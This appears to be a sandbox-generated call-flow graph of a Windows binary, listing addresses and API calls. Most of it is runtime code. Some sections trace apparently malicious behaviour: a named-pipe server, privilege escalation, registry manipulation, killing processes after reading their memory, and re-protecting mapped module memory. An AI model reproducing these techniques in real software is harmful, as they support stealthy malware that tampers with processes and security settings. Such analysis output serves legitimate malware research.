17772 279a92846c4 17771->17772 17773 279a9279324 _CallSETranslator 9 API calls 17772->17773 17774 279a92846d9 17773->17774 17775 279a927c2f4 14 API calls 17774->17775 17775->17776 18481 279a9283960 18491 279a9278ca0 18481->18491 18483 279a9283988 18485 279a9279324 _CallSETranslator 9 API calls 18486 279a9283998 18485->18486 18487 279a9279324 _CallSETranslator 9 API calls 18486->18487 18488 279a92839a1 18487->18488 18489 279a927c2f4 14 API calls 18488->18489 18490 279a92839aa 18489->18490 18492 279a9278cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 18491->18492 18493 279a9278dd1 18492->18493 18494 279a9278d94 RtlUnwindEx 18492->18494 18493->18483 18493->18485 18494->18492 18563 279a9275974 18564 279a927597a 18563->18564 18575 279a9277fa0 18564->18575 18568 279a92759de 18570 279a9275a77 18570->18568 18572 279a9275bfd 18570->18572 18588 279a9277b80 18570->18588 18571 279a9275cfb 18572->18571 18573 279a9275d77 VirtualProtect 18572->18573 18573->18568 18574 279a9275da3 GetLastError 18573->18574 18574->18568 18576 279a9277fab 18575->18576 18577 279a92759bd 18576->18577 18578 279a927b470 _invalid_parameter_noinfo 2 API calls 18576->18578 18579 279a9277fca 18576->18579 18577->18568 18584 279a9274400 18577->18584 18578->18576 18582 279a9277fd5 18579->18582 18594 279a92787b8 18579->18594 18598 279a92787d8 18582->18598 18585 279a927441d 18584->18585 18587 279a927448c 18585->18587 18602 279a9274670 18585->18602 18587->18570 18589 279a9277bc7 18588->18589 18627 279a9277950 18589->18627 18592 279a9278070 _invalid_parameter_noinfo 8 API calls 18593 279a9277bf1 18592->18593 18593->18570 18595 279a92787c6 std::bad_alloc::bad_alloc 18594->18595 18596 279a9279178 Concurrency::cancel_current_task 2 API calls 18595->18596 18597 279a92787d7 18596->18597 18599 279a92787e6 std::bad_alloc::bad_alloc 18598->18599 18600 279a9279178 Concurrency::cancel_current_task 2 API calls 18599->18600 18601 279a9277fdb 18600->18601 18603 279a92746b7 18602->18603 18604 279a9274694 18602->18604 18605 279a92746ed 18603->18605 18622 279a9274250 18603->18622 18604->18603 18616 279a9274120 18604->18616 18607 279a927471d 18605->18607 18609 279a9274250 2 API calls 18605->18609 18610 279a9274120 3 API calls 18607->18610 18613 279a9274753 18607->18613 18609->18607 18610->18613 18611 279a9274120 3 API calls 18612 279a927476f 18611->18612 18614 279a9274250 2 API calls 18612->18614 18615 279a927478b 18612->18615 18613->18611 18613->18612 18614->18615 18615->18587 18619 279a9274141 18616->18619 18617 279a9274196 VirtualQuery 18618 279a92741b0 18617->18618 18617->18619 18618->18603 18619->18617 18619->18618 18620 279a92741ca VirtualAlloc 18619->18620 18620->18618 18621 279a92741fb GetLastError 18620->18621 18621->18618 18621->18619 18623 279a9274268 18622->18623 18624 279a92742bd VirtualQuery 18623->18624 18625 279a92742d7 18623->18625 18626 279a9274322 GetLastError 18623->18626 18624->18623 18624->18625 18625->18605 18626->18623 18628 279a927796b 18627->18628 18629 279a927798f 18628->18629 18630 279a9277981 SetLastError 18628->18630 18629->18592 18630->18629 17780 279a9278672 17781 279a92790c0 __std_exception_copy 38 API calls 17780->17781 17782 279a927869d 17781->17782 16071 279a927f870 16072 279a927f8a0 16071->16072 16074 279a927f8c7 16071->16074 16072->16074 16078 279a927f8b4 16072->16078 16094 279a927cb10 16072->16094 16075 279a927f99c 16074->16075 16109 279a927c558 EnterCriticalSection 16074->16109 16079 279a927fab3 16075->16079 16082 279a927fa03 16075->16082 16086 279a927f9ca 16075->16086 16076 279a927f904 16078->16074 16078->16076 16081 279a927f949 16078->16081 16080 279a927fac0 16079->16080 16119 279a927c5ac LeaveCriticalSection 16079->16119 16103 279a927d1f4 16081->16103 16091 279a927fa61 16082->16091 16118 279a927c5ac LeaveCriticalSection 16082->16118 16086->16082 16110 279a927cab0 16086->16110 16090 279a927f9f3 16092 279a927cab0 _invalid_parameter_noinfo 14 API calls 16090->16092 16093 279a927cab0 14 API calls _invalid_parameter_noinfo 16091->16093 16092->16082 16093->16091 16095 279a927cb59 GetLastError 16094->16095 16098 279a927cb2f __std_exception_copy 16094->16098 16096 279a927cb6c 16095->16096 16099 279a927cb8a SetLastError 16096->16099 16100 279a927cb87 16096->16100 16102 279a927c940 _invalid_parameter_noinfo 11 API calls 16096->16102 16097 279a927cb54 16097->16078 16098->16097 16120 279a927c940 GetLastError 16098->16120 16099->16097 16100->16099 16102->16100 16104 279a927cb10 __std_exception_copy 13 API calls 16103->16104 16105 279a927d1fd 16104->16105 16106 279a927d04c 16105->16106 16179 279a927cef8 16106->16179 16111 279a927cb10 __std_exception_copy 13 API calls 16110->16111 16113 279a927cab9 16111->16113 16112 279a927cabe 16112->16090 16113->16112 16114 279a927cae8 FlsGetValue 16113->16114 16116 279a927cae4 16113->16116 16114->16116 16115 279a927cafe 16115->16090 16116->16115 16117 279a927c940 _invalid_parameter_noinfo 13 API calls 16116->16117 16117->16115 16121 279a927c966 16120->16121 16122 279a927c96c SetLastError 16121->16122 16138 279a927d220 16121->16138 16123 279a927c9e5 16122->16123 16123->16097 16126 279a927c9a5 FlsSetValue 16129 279a927c9b1 FlsSetValue 16126->16129 16130 279a927c9c8 16126->16130 16127 279a927c995 FlsSetValue 16145 279a927d2a0 16127->16145 16132 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 16129->16132 16151 279a927c758 16130->16151 16134 279a927c9c6 SetLastError 16132->16134 16134->16123 16143 279a927d231 _invalid_parameter_noinfo 16138->16143 16139 279a927d282 16142 279a927d1f4 __std_exception_copy 12 API calls 16139->16142 16140 279a927d266 HeapAlloc 16141 279a927c987 16140->16141 16140->16143 16141->16126 16141->16127 16142->16141 16143->16139 16143->16140 16156 279a927b470 16143->16156 16146 279a927d2a5 HeapFree 16145->16146 16147 279a927c9a3 16145->16147 16146->16147 16148 279a927d2c0 GetLastError 16146->16148 16147->16122 16149 279a927d2cd Concurrency::details::SchedulerProxy::DeleteThis 16148->16149 16150 279a927d1f4 __std_exception_copy 11 API calls 16149->16150 16150->16147 16165 279a927c630 16151->16165 16159 279a927b4c0 16156->16159 16164 279a927c558 EnterCriticalSection 16159->16164 16177 279a927c558 EnterCriticalSection 16165->16177 16180 279a927cf23 16179->16180 16187 279a927cf94 16180->16187 16182 279a927cf4a 16183 279a927cf6d 16182->16183 16197 279a927c3e0 16182->16197 16185 279a927cf82 16183->16185 16186 279a927c3e0 _invalid_parameter_noinfo 17 API calls 16183->16186 16185->16076 16186->16185 16210 279a927ccc8 16187->16210 16193 279a927cfcf 16193->16182 16198 279a927c438 16197->16198 16199 279a927c3ef GetLastError 16197->16199 16198->16183 16200 279a927c404 16199->16200 16201 279a927cba0 _invalid_parameter_noinfo 14 API calls 16200->16201 16202 279a927c41e SetLastError 16201->16202 16202->16198 16203 279a927c441 16202->16203 16204 279a927c3e0 _invalid_parameter_noinfo 15 API calls 16203->16204 16205 279a927c467 16204->16205 16250 279a927ffe8 16205->16250 16211 279a927cce4 GetLastError 16210->16211 16212 279a927cd1f 16210->16212 16213 279a927ccf4 16211->16213 16212->16193 16216 279a927cd34 16212->16216 16223 279a927cba0 16213->16223 16217 279a927cd68 16216->16217 16218 279a927cd50 GetLastError SetLastError 16216->16218 16217->16193 16219 279a927d06c IsProcessorFeaturePresent 16217->16219 16218->16217 16220 279a927d07f 16219->16220 16228 279a927cd80 16220->16228 16224 279a927cbc8 FlsGetValue 16223->16224 16226 279a927cbc4 16223->16226 16224->16226 16225 279a927cbde SetLastError 16225->16212 16226->16225 16227 279a927c940 _invalid_parameter_noinfo 13 API calls 16226->16227 16227->16225 16229 279a927cdba _invalid_parameter_noinfo 16228->16229 16230 279a927cde2 RtlCaptureContext RtlLookupFunctionEntry 16229->16230 16231 279a927ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16230->16231 16232 279a927ce2e RtlVirtualUnwind 16230->16232 16234 279a927ceb6 _invalid_parameter_noinfo 16231->16234 16232->16231 16236 279a9278070 16234->16236 16237 279a9278079 16236->16237 16238 279a9278848 IsProcessorFeaturePresent 16237->16238 16239 279a9278084 GetCurrentProcess TerminateProcess 16237->16239 16240 279a9278860 16238->16240 16245 279a927891c RtlCaptureContext 16240->16245 16246 279a9278936 RtlLookupFunctionEntry 16245->16246 16247 279a927894c RtlVirtualUnwind 16246->16247 16248 279a9278873 16246->16248 16247->16246 16247->16248 16249 279a9278814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16248->16249 16251 279a9280001 16250->16251 16252 279a927c48f 16250->16252 16251->16252 16258 279a9280a40 16251->16258 16254 279a9280054 16252->16254 16255 279a927c49f 16254->16255 16256 279a928006d 16254->16256 16255->16183 16256->16255 16268 279a927e8c4 16256->16268 16259 279a927cab0 _invalid_parameter_noinfo 14 API calls 16258->16259 16260 279a9280a4f 16259->16260 16266 279a9280a95 16260->16266 16267 279a927c558 EnterCriticalSection 16260->16267 16266->16252 16269 279a927cab0 _invalid_parameter_noinfo 14 API calls 16268->16269 16270 279a927e8cd 16269->16270 17098 279a927f370 VirtualProtect 18631 279a92781c0 18632 279a92781c9 __scrt_acquire_startup_lock 18631->18632 18634 279a92781cd 18632->18634 18635 279a927bbb4 18632->18635 18636 279a927bbd4 18635->18636 18663 279a927bbed 18635->18663 18637 279a927bbf2 18636->18637 18638 279a927bbdc 18636->18638 18640 279a927e864 56 API calls 18637->18640 18639 279a927d1f4 __std_exception_copy 13 API calls 18638->18639 18641 279a927bbe1 18639->18641 18642 279a927bbf7 18640->18642 18643 279a927d04c _invalid_parameter_noinfo 38 API calls 18641->18643 18664 279a927df38 GetModuleFileNameW 18642->18664 18643->18663 18650 279a927bc69 18652 279a927d1f4 __std_exception_copy 13 API calls 18650->18652 18651 279a927bc7a 18653 279a927b994 14 API calls 18651->18653 18662 279a927bc6e 18652->18662 18655 279a927bc96 18653->18655 18654 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18654->18663 18656 279a927bcc6 18655->18656 18657 279a927bcdf 18655->18657 18655->18662 18658 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18656->18658 18660 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18657->18660 18659 279a927bccf 18658->18659 18661 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18659->18661 18660->18662 18661->18663 18662->18654 18663->18634 18665 279a927df91 18664->18665 18666 279a927df7d GetLastError 18664->18666 18668 279a927dd78 14 API calls 18665->18668 18688 279a927d184 18666->18688 18670 279a927dfbf 18668->18670 18669 279a927df8a 18671 279a9278070 _invalid_parameter_noinfo 8 API calls 18669->18671 18673 279a927dfd0 18670->18673 18693 279a927f198 18670->18693 18675 279a927bc0e 18671->18675 18697 279a927de1c 18673->18697 18676 279a927b994 18675->18676 18678 279a927b9d2 18676->18678 18680 279a927ba38 18678->18680 18714 279a927ec1c 18678->18714 18679 279a927bb25 18682 279a927bb54 18679->18682 18680->18679 18681 279a927ec1c 14 API calls 18680->18681 18681->18680 18683 279a927bba4 18682->18683 18684 279a927bb6c 18682->18684 18683->18650 18683->18651 18684->18683 18685 279a927d220 _invalid_parameter_noinfo 13 API calls 18684->18685 18686 279a927bb9a 18685->18686 18687 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18686->18687 18687->18683 18711 279a927d1d0 18688->18711 18690 279a927d191 Concurrency::details::SchedulerProxy::DeleteThis 18691 279a927d1f4 __std_exception_copy 13 API calls 18690->18691 18692 279a927d1a1 18691->18692 18692->18669 18694 279a927f1ca 18693->18694 18695 279a927f1a9 18693->18695 18694->18673 18695->18694 18696 279a927ef88 9 API calls 18695->18696 18696->18694 18698 279a927de5b 18697->18698 18699 279a927de40 18697->18699 18700 279a927ece8 WideCharToMultiByte 18698->18700 18705 279a927de60 18698->18705 18699->18669 18701 279a927deb7 18700->18701 18703 279a927debe GetLastError 18701->18703 18704 279a927dee9 18701->18704 18701->18705 18702 279a927d1f4 __std_exception_copy 13 API calls 18702->18699 18706 279a927d184 13 API calls 18703->18706 18708 279a927ece8 WideCharToMultiByte 18704->18708 18705->18699 18705->18702 18707 279a927decb 18706->18707 18709 279a927d1f4 __std_exception_copy 13 API calls 18707->18709 18710 279a927df10 18708->18710 18709->18699 18710->18699 18710->18703 18712 279a927cb10 __std_exception_copy 13 API calls 18711->18712 18713 279a927d1d9 18712->18713 18713->18690 18715 279a927eba8 18714->18715 18716 279a927dd78 14 API calls 18715->18716 18717 279a927ebcc 18716->18717 18717->18678 17199 279a92847c2 17200 279a9279978 __CxxCallCatchBlock 9 API calls 17199->17200 17206 279a92847d5 17200->17206 17201 279a9279324 _CallSETranslator 9 API calls 17202 279a9284828 17201->17202 17203 279a9279324 _CallSETranslator 9 API calls 17202->17203 17205 279a9284838 17203->17205 17204 279a9278ff8 __CxxCallCatchBlock 9 API calls 17207 279a9284814 __CxxCallCatchBlock 17204->17207 17206->17204 17206->17207 17207->17201 15579 140003728 15580 140003735 15579->15580 15582 140003755 ConnectNamedPipe 15580->15582 15583 14000374a Sleep 15580->15583 15590 140002300 AllocateAndInitializeSid 15580->15590 15584 1400037b3 Sleep 15582->15584 15585 140003764 ReadFile 15582->15585 15583->15580 15587 1400037be DisconnectNamedPipe 15584->15587 15586 140003787 15585->15586 15585->15587 15589 1400031c4 31 API calls 15586->15589 15587->15582 15588 14000378d WriteFile 15588->15587 15589->15588 15591 14000241b 15590->15591 15592 14000235d SetEntriesInAclW 15590->15592 15591->15580 15592->15591 15593 1400023a1 LocalAlloc 15592->15593 15593->15591 15594 1400023b5 InitializeSecurityDescriptor 15593->15594 15594->15591 15595 1400023c5 SetSecurityDescriptorDacl 15594->15595 15595->15591 15596 1400023dc CreateNamedPipeW 15595->15596 15596->15591 17217 279a9271bc4 17224 279a9271724 GetProcessHeap HeapAlloc 17217->17224 17219 279a9271bda Sleep 17220 279a9271724 50 API calls 17219->17220 17222 279a9271bd3 17220->17222 17222->17219 17223 279a927159c StrCmpIW StrCmpW 17222->17223 17275 279a92719b0 17222->17275 17223->17222 17292 279a9271264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17224->17292 17226 279a927174c 17293 279a9271000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17226->17293 17228 279a9271754 17294 279a9271264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17228->17294 17230 279a927175d 17295 279a9271264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17230->17295 17232 279a9271766 17296 279a9271264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17232->17296 17234 279a927176f 17297 279a9271000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17234->17297 17236 279a9271778 17298 279a9271000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17236->17298 17238 279a9271781 17299 279a9271000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 17238->17299 17240 279a927178a RegOpenKeyExW 17241 279a92717bc RegOpenKeyExW 17240->17241 17242 279a92719a2 17240->17242 17243 279a92717fb RegOpenKeyExW 17241->17243 17244 279a92717e5 17241->17244 17242->17222 17246 279a927181f 17243->17246 17247 279a9271836 RegOpenKeyExW 17243->17247 17300 279a92712b8 RegQueryInfoKeyW 17244->17300 17309 279a927104c RegQueryInfoKeyW 17246->17309 17250 279a927185a 17247->17250 17251 279a9271871 RegOpenKeyExW 17247->17251 17253 279a92712b8 16 API calls 17250->17253 17254 279a92718ac RegOpenKeyExW 17251->17254 17255 279a9271895 17251->17255 17258 279a9271867 RegCloseKey 17253->17258 17256 279a92718d0 17254->17256 17257 279a92718e7 RegOpenKeyExW 17254->17257 17259 279a92712b8 16 API calls 17255->17259 17260 279a92712b8 16 API calls 17256->17260 17261 279a927190b 17257->17261 17262 279a9271922 RegOpenKeyExW 17257->17262 17258->17251 17263 279a92718a2 RegCloseKey 17259->17263 17264 279a92718dd RegCloseKey 17260->17264 17265 279a927104c 6 API calls 17261->17265 17266 279a927195d RegOpenKeyExW 17262->17266 17267 279a9271946 17262->17267 17263->17254 17264->17257 17268 279a9271918 RegCloseKey 17265->17268 17270 279a9271998 RegCloseKey 17266->17270 17271 279a9271981 17266->17271 17269 279a927104c 6 API calls 17267->17269 17268->17262 17272 279a9271953 RegCloseKey 17269->17272 17270->17242 17273 279a927104c 6 API calls 17271->17273 17272->17266 17274 279a927198e RegCloseKey 17273->17274 17274->17270 17314 279a92714a0 17275->17314 17292->17226 17293->17228 17294->17230 17295->17232 17296->17234 17297->17236 17298->17238 17299->17240 17301 279a9271486 RegCloseKey 17300->17301 17302 279a9271323 GetProcessHeap HeapAlloc 17300->17302 17301->17243 17303 279a927134e RegEnumValueW 17302->17303 17304 279a9271472 GetProcessHeap HeapFree 17302->17304 17305 279a92713a1 17303->17305 17304->17301 17305->17303 17305->17304 17306 279a9271530 2 API calls 17305->17306 17307 279a92713cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 17305->17307 17308 279a927141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 17305->17308 17306->17305 17307->17308 17308->17305 17310 279a92711b5 RegCloseKey 17309->17310 17312 279a92710bf 17309->17312 17310->17247 17311 279a92710cf RegEnumValueW 17311->17312 17312->17310 17312->17311 17313 279a927114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 17312->17313 17313->17312 17315 279a92714e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 17314->17315 17316 279a92714c2 GetProcessHeap HeapFree 17314->17316 17316->17315 17316->17316 17317 279a9275fcc 17318 279a9275fd3 17317->17318 17319 279a9276000 VirtualProtect 17318->17319 17321 279a9275f10 17318->17321 17320 279a9276029 GetLastError 17319->17320 17319->17321 17320->17321 15442 140002d38 15445 140002d4c 15442->15445 15446 140002d5e OpenMutexW 15445->15446 15447 140002d84 CloseHandle 15446->15447 15448 140002d77 Sleep 15446->15448 15493 140002a0c 15447->15493 15448->15446 15451 140002a0c 14 API calls 15452 140002da5 GetCurrentProcessId OpenProcess 15451->15452 15453 140002dc3 OpenProcessToken 15452->15453 15454 140002e39 RegOpenKeyExW 15452->15454 15455 140002dd9 LookupPrivilegeValueW 15453->15455 15456 140002e30 CloseHandle 15453->15456 15457 140002d41 ExitProcess 15454->15457 15458 140002e6a RegQueryValueExW 15454->15458 15455->15456 15459 140002df0 AdjustTokenPrivileges 15455->15459 15456->15454 15458->15457 15460 140002e9a RegQueryValueExW 15458->15460 15459->15456 15461 140002e2a GetLastError 15459->15461 15460->15457 15462 140002eca GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 15460->15462 15461->15456 15462->15457 15463 140002f3c RegQueryValueExW 15462->15463 15463->15457 15464 140002f6c RegCloseKey GetCurrentProcessId 15463->15464 15507 14000200c GetProcessHeap HeapAlloc 15464->15507 15466 140002f83 RegCreateKeyExW 15467 14000307d CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 15466->15467 15468 140002fc0 ConvertStringSecurityDescriptorToSecurityDescriptorW 15466->15468 15469 14000151c 50 API calls 15467->15469 15470 140003002 RegCreateKeyExW 15468->15470 15471 140002fe8 RegSetKeySecurity LocalFree 15468->15471 15474 140003107 15469->15474 15472 140003073 RegCloseKey 15470->15472 15473 14000303c GetCurrentProcessId RegSetValueExW RegCloseKey 15470->15473 15471->15470 15472->15467 15473->15472 15475 140003113 ShellExecuteW 15474->15475 15476 140003145 15474->15476 15475->15475 15475->15476 15477 14000148c 6 API calls 15476->15477 15478 14000314d 15477->15478 15479 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15478->15479 15480 140003156 15479->15480 15481 14000148c 6 API calls 15480->15481 15482 14000315f 15481->15482 15483 14000148c 6 API calls 15482->15483 15484 140003168 15483->15484 15485 14000148c 6 API calls 15484->15485 15486 140003171 15485->15486 15487 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15486->15487 15488 14000317a 15487->15488 15489 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15488->15489 15490 140003183 15489->15490 15491 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15490->15491 15492 14000318c GetProcessHeap HeapFree SleepEx 15491->15492 15492->15457 15494 140002a15 StrCpyW StrCatW GetModuleHandleW 15493->15494 15495 140002bdf 15493->15495 15494->15495 15496 140002a66 GetCurrentProcess K32GetModuleInformation 15494->15496 15495->15451 15497 140002bd6 FreeLibrary 15496->15497 15498 140002a96 CreateFileW 15496->15498 15497->15495 15498->15497 15499 140002acb CreateFileMappingW 15498->15499 15500 140002af4 MapViewOfFile 15499->15500 15501 140002bcd CloseHandle 15499->15501 15502 140002bc4 CloseHandle 15500->15502 15504 140002b17 15500->15504 15501->15497 15502->15501 15503 140002b30 lstrcmpiA 15503->15504 15505 140002b70 VirtualProtect VirtualProtect 15503->15505 15504->15502 15504->15503 15506 140002b6e 15504->15506 15505->15502 15506->15502 15513 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 15507->15513 15509 1400020a5 GetProcessHeap HeapFree 15510 140002050 15510->15509 15511 140002071 OpenProcess 15510->15511 15511->15510 15512 140002087 TerminateProcess CloseHandle 15511->15512 15512->15510 15514 140001e58 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 15513->15514 15518 140001d7d 15513->15518 15514->15510 15515 140001d92 OpenProcess 15516 140001daf K32EnumProcessModulesEx 15515->15516 15515->15518 15517 140001e43 CloseHandle 15516->15517 15516->15518 15517->15518 15518->15514 15518->15515 15518->15517 15519 140001de9 ReadProcessMemory 15518->15519 15520 140001e0b 15519->15520 15520->15517 15520->15518 15520->15519 18809 279a927c1d8 18810 279a927c1f1 18809->18810 18811 279a927c209 18809->18811 18810->18811 18812 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18810->18812 18812->18811 17790 279a9272ed8 17792 279a9272f35 17790->17792 17791 279a9272f50 17792->17791 17793 279a92738a8 3 API calls 17792->17793 17793->17791 16283 279a927b0d4 16290 279a927b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 16283->16290 16284 279a927b0fb 16285 279a9279324 _CallSETranslator 9 API calls 16284->16285 16286 279a927b100 16285->16286 16287 279a9279324 _CallSETranslator 9 API calls 16286->16287 16288 279a927b10b __FrameHandler3::GetHandlerSearchState 16286->16288 16287->16288 16289 279a92799cc 9 API calls Is_bad_exception_allowed 16289->16290 16290->16284 16290->16288 16290->16289 16292 279a92799f4 16290->16292 16293 279a9279324 _CallSETranslator 9 API calls 16292->16293 16294 279a9279a02 16293->16294 16294->16290 18816 279a92819d0 18817 279a927e864 56 API calls 18816->18817 18818 279a92819d9 18817->18818 17340 279a9280fa8 17341 279a9280fcc 17340->17341 17342 279a9278070 _invalid_parameter_noinfo 8 API calls 17341->17342 17343 279a928100e 17342->17343 17344 279a92733a8 17345 279a92733cf 17344->17345 17346 279a927349c 17345->17346 17347 279a92733ec PdhGetCounterInfoW 17345->17347 17347->17346 17348 279a927340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 17347->17348 17349 279a9273440 StrCmpW 17348->17349 17350 279a9273488 GetProcessHeap HeapFree 17348->17350 17349->17350 17352 279a9273455 17349->17352 17350->17346 17351 279a9273950 12 API calls 17351->17352 17352->17350 17352->17351 17353 279a928479d 17356 279a927af34 17353->17356 17357 279a927af4e 17356->17357 17359 279a927af9b 17356->17359 17358 279a9279324 _CallSETranslator 9 API calls 17357->17358 17357->17359 17358->17359 15737 279a927f6a0 15748 279a927c558 EnterCriticalSection 15737->15748 15739 279a927f6b0 15740 279a9281c5c 39 API calls 15739->15740 15741 279a927f6b9 15740->15741 15743 279a927f498 41 API calls 15741->15743 15747 279a927f6c7 15741->15747 15742 279a927c5ac Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 15745 279a927f6d3 15742->15745 15744 279a927f6c2 15743->15744 15746 279a927f598 GetStdHandle GetFileType 15744->15746 15746->15747 15747->15742 17827 279a927aaac 17828 279a927aad9 __except_validate_context_record 17827->17828 17829 279a9279324 _CallSETranslator 9 API calls 17828->17829 17830 279a927aade 17829->17830 17832 279a927ab38 17830->17832 17834 279a927abc6 17830->17834 17841 279a927ab8c 17830->17841 17831 279a927ac34 17831->17841 17869 279a927a22c 17831->17869 17833 279a927abb3 17832->17833 17832->17841 17842 279a927ab5a __GetCurrentState 17832->17842 17856 279a92795d0 17833->17856 17838 279a927abe5 17834->17838 17863 279a92799cc 17834->17863 17838->17831 17838->17841 17866 279a92799e0 17838->17866 17839 279a927acdd 17842->17839 17844 279a927afb8 17842->17844 17845 279a92799cc Is_bad_exception_allowed 9 API calls 17844->17845 17846 279a927afe7 __GetCurrentState 17845->17846 17847 279a9279324 _CallSETranslator 9 API calls 17846->17847 17853 279a927b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 17847->17853 17848 279a927b0fb 17849 279a9279324 _CallSETranslator 9 API calls 17848->17849 17850 279a927b100 17849->17850 17851 279a9279324 _CallSETranslator 9 API calls 17850->17851 17852 279a927b10b __FrameHandler3::GetHandlerSearchState 17850->17852 17851->17852 17852->17841 17853->17848 17853->17852 17854 279a92799cc 9 API calls Is_bad_exception_allowed 17853->17854 17855 279a92799f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17853->17855 17854->17853 17855->17853 17926 279a9279634 17856->17926 17858 279a92795ef __FrameHandler3::ExecutionInCatch 17930 279a9279540 17858->17930 17861 279a927afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17862 279a9279624 17861->17862 17862->17841 17864 279a9279324 _CallSETranslator 9 API calls 17863->17864 17865 279a92799d5 17864->17865 17865->17838 17867 279a9279324 _CallSETranslator 9 API calls 17866->17867 17868 279a92799e9 17867->17868 17868->17831 17934 279a927b144 17869->17934 17871 279a927a6f4 17872 279a927a645 17872->17871 17912 279a927a643 17872->17912 17987 279a927a6fc 17872->17987 17873 279a927a373 17873->17872 17883 279a927a3ab 17873->17883 17875 279a9279324 _CallSETranslator 9 API calls 17879 279a927a687 17875->17879 17876 279a927a575 17882 279a927a592 17876->17882 17886 279a92799cc Is_bad_exception_allowed 9 API calls 17876->17886 17876->17912 17877 279a9279324 _CallSETranslator 9 API calls 17880 279a927a2da 17877->17880 17879->17871 17881 279a9278070 _invalid_parameter_noinfo 8 API calls 17879->17881 17880->17879 17884 279a9279324 _CallSETranslator 9 API calls 17880->17884 17885 279a927a69a 17881->17885 17889 279a927a5b4 17882->17889 17882->17912 17980 279a92795a4 17882->17980 17883->17876 17900 279a92799e0 9 API calls 17883->17900 17959 279a927a96c 17883->17959 17973 279a927a158 17883->17973 17888 279a927a2ea 17884->17888 17885->17841 17886->17882 17890 279a9279324 _CallSETranslator 9 API calls 17888->17890 17891 279a927a5ca 17889->17891 17889->17912 17923 279a927a6d7 17889->17923 17892 279a927a2f3 17890->17892 17893 279a927a5d5 17891->17893 17896 279a92799cc Is_bad_exception_allowed 9 API calls 17891->17896 17945 279a9279a0c 17892->17945 17899 279a927b1dc 9 API calls 17893->17899 17894 279a9279324 _CallSETranslator 9 API calls 17897 279a927a6dd 17894->17897 17896->17893 17898 279a9279324 _CallSETranslator 9 API calls 17897->17898 17901 279a927a6e6 17898->17901 17903 279a927a5eb 17899->17903 17900->17883 17905 279a927c2f4 14 API calls 17901->17905 17907 279a9279634 __GetUnwindTryBlock RtlLookupFunctionEntry 17903->17907 17903->17912 17904 279a9279324 _CallSETranslator 9 API calls 17906 279a927a335 17904->17906 17905->17871 17906->17873 17909 279a9279324 _CallSETranslator 9 API calls 17906->17909 17908 279a927a605 17907->17908 17984 279a9279838 RtlUnwindEx 17908->17984 17911 279a927a341 17909->17911 17913 279a9279324 _CallSETranslator 9 API calls 17911->17913 17912->17875 17914 279a927a34a 17913->17914 17948 279a927b1dc 17914->17948 17919 279a927a35e 17955 279a927b2cc 17919->17955 17921 279a927a6d1 17922 279a927c2f4 14 API calls 17921->17922 17922->17923 17923->17894 17924 279a927a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 17924->17921 17999 279a9279178 17924->17999 17927 279a9279662 __FrameHandler3::ExecutionInCatch 17926->17927 17928 279a92796d4 17927->17928 17929 279a927968c RtlLookupFunctionEntry 17927->17929 17928->17858 17929->17927 17931 279a927958b 17930->17931 17933 279a9279560 17930->17933 17931->17861 17932 279a9279324 _CallSETranslator 9 API calls 17932->17933 17933->17931 17933->17932 17935 279a927b169 __FrameHandler3::ExecutionInCatch 17934->17935 17936 279a9279634 __GetUnwindTryBlock RtlLookupFunctionEntry 17935->17936 17937 279a927b17e 17936->17937 18004 279a9279db4 17937->18004 17940 279a927b190 __FrameHandler3::GetHandlerSearchState 18007 279a9279dec 17940->18007 17941 279a927b1b3 17942 279a9279db4 __GetUnwindTryBlock RtlLookupFunctionEntry 17941->17942 17944 279a927a28e 17942->17944 17944->17871 17944->17873 17944->17877 17946 279a9279324 _CallSETranslator 9 API calls 17945->17946 17947 279a9279a1a 17946->17947 17947->17871 17947->17904 17950 279a927b2c3 17948->17950 17953 279a927b207 17948->17953 17949 279a927a35a 17949->17873 17949->17919 17951 279a92799e0 9 API calls 17951->17953 17952 279a92799cc Is_bad_exception_allowed 9 API calls 17952->17953 17953->17949 17953->17951 17953->17952 17954 279a927a96c 9 API calls 17953->17954 17954->17953 17956 279a927b339 17955->17956 17958 279a927b2e9 Is_bad_exception_allowed 17955->17958 17956->17924 17957 279a92799cc 9 API calls Is_bad_exception_allowed 17957->17958 17958->17956 17958->17957 17960 279a927aa28 17959->17960 17961 279a927a999 17959->17961 17960->17883 17962 279a92799cc Is_bad_exception_allowed 9 API calls 17961->17962 